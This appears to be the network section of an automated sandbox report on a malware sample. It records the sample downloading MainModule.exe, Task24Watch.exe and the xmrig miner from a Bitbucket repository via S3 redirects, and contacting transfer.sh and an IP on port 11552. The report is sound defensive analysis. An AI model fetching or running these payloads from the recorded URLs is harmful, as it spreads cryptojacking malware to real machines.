Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
bitbucket.org | 104.192.141.1 | |
bbuseruploads.s3.amazonaws.com |
CNAME
s3-1-w.amazonaws.com
|
52.217.206.129 |
transfer.sh | 144.76.136.153 |
- TCP Requests
-
-
192.168.56.103:49169 104.192.141.1:443bitbucket.org
-
192.168.56.103:49181 104.192.141.1:443bitbucket.org
-
192.168.56.103:49209 104.192.141.1:443bitbucket.org
-
192.168.56.103:49172 144.76.136.153:443transfer.sh
-
192.168.56.103:49166 168.119.228.126:11552
-
192.168.56.103:49170 52.216.212.249:443bbuseruploads.s3.amazonaws.com
-
192.168.56.103:49210 52.217.40.228:443bbuseruploads.s3.amazonaws.com
-
192.168.56.103:49182 54.231.132.1:443bbuseruploads.s3.amazonaws.com
-
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:53673
-
8.8.8.8:53 192.168.56.103:56613
-
8.8.8.8:53 192.168.56.103:62576
-
8.8.8.8:53 192.168.56.103:64894
-
GET
302
https://bitbucket.org/rpoverka/zhopa/downloads/MainModule.exe
REQUEST
RESPONSE
BODY
GET /rpoverka/zhopa/downloads/MainModule.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
HTTP/1.1 302 Found
content-security-policy-report-only: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 999303.105
vary: Accept-Language, Origin
x-usage-request-cost: 866.27
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: 408aa5e47f821a94
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Tue, 21 Feb 2023 04:33:08 GMT
x-usage-user-time: 0.025988
x-usage-system-time: 0.000000
location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237
expires: Tue, 21 Feb 2023 04:33:08 GMT
x-served-by: 10bd9f68300c
x-envoy-upstream-service-time: 618
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: 7676b48801ad
x-render-time: 0.48598599433898926
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: 7676b48801ad
x-request-count: 3126
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET
200
https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237
REQUEST
RESPONSE
BODY
GET /92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: ZixwJfCa2JbaEUglxxFtXxoX4cqzjoJIbHFG9zJL3CtGHTR+wFvDT30RvaS8zTCdwoiWvaLROtQ=
x-amz-request-id: H9XGYTKDCAGJQKC6
Date: Tue, 21 Feb 2023 04:33:10 GMT
Last-Modified: Thu, 16 Feb 2023 12:57:54 GMT
ETag: "34b13de397e2d25f22dd9de0acf26d96"
x-amz-server-side-encryption: AES256
x-amz-version-id: KovB6eLABpfhjlzRV4BF4eHt4rQb0noc
Content-Disposition: attachment; filename="MainModule.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 64000
GET
302
https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe
REQUEST
RESPONSE
BODY
GET /rpoverka/zhopa/downloads/Task24Watch.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
HTTP/1.1 302 Found
content-security-policy-report-only: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 998982.902
vary: Accept-Language, Origin
x-usage-request-cost: 1030.60
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: a2c1697924f08b4d
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Tue, 21 Feb 2023 04:33:17 GMT
x-usage-user-time: 0.021893
x-usage-system-time: 0.009025
location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379
expires: Tue, 21 Feb 2023 04:33:17 GMT
x-served-by: 10bd9f68300c
x-envoy-upstream-service-time: 56
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: 7676b48801ad
x-render-time: 0.047059059143066406
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: 7676b48801ad
x-request-count: 3378
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET
200
https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379
REQUEST
RESPONSE
BODY
GET /92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: G2ILWJnysuxnhPRQnbHyvuSuM0T76VZ2R09HUZlubLhmM6b0Le5jtBn9uImrkStcIt3hm1UtDC8=
x-amz-request-id: AJFB7M1B4X2Y6CSW
Date: Tue, 21 Feb 2023 04:33:18 GMT
Last-Modified: Thu, 16 Feb 2023 12:55:55 GMT
ETag: "acf4152befc5768daaf11c92fd3899b0"
x-amz-server-side-encryption: AES256
x-amz-version-id: LTRtxqABDUvJvdVyXIh5.wpjrb_ZMyLA
Content-Disposition: attachment; filename="Task24Watch.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 25088
GET
302
https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe
REQUEST
RESPONSE
BODY
GET /rpoverka/zhopa/downloads/xmrig.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
HTTP/1.1 302 Found
content-security-policy-report-only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 999078.046
vary: Accept-Language, Origin
x-usage-request-cost: 936.47
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: 5a5f47b57fe7862a
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Tue, 21 Feb 2023 04:33:39 GMT
x-usage-user-time: 0.028094
x-usage-system-time: 0.000000
location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428
expires: Tue, 21 Feb 2023 04:33:39 GMT
x-served-by: 22360fed4cf9
x-envoy-upstream-service-time: 60
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: 7676b48801ad
x-render-time: 0.04874062538146973
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: 7676b48801ad
x-request-count: 3239
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET
200
https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428
REQUEST
RESPONSE
BODY
GET /92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: ouRJ7UoWlOBLsYo6hjOmBb4S3EbNBmGFsdi5OzUX7SJvGHSlcdl4onpE6yE8BlGGAn4kN9ZKyJI=
x-amz-request-id: 1S4T14V8ZGF6SFEZ
Date: Tue, 21 Feb 2023 04:33:41 GMT
Last-Modified: Thu, 16 Feb 2023 12:56:44 GMT
ETag: "6c454e10bbea489cfc96253fe55ec282"
x-amz-server-side-encryption: AES256
x-amz-version-id: F_.ySUKVb296RAW45ELrPoA1P..Dfu7X
Content-Disposition: attachment; filename="xmrig.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 5402112
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49170 52.216.212.249:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49209 104.192.141.1:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49169 104.192.141.1:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49181 104.192.141.1:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49182 54.231.132.1:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49210 52.217.40.228:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
Snort Alerts
No Snort Alerts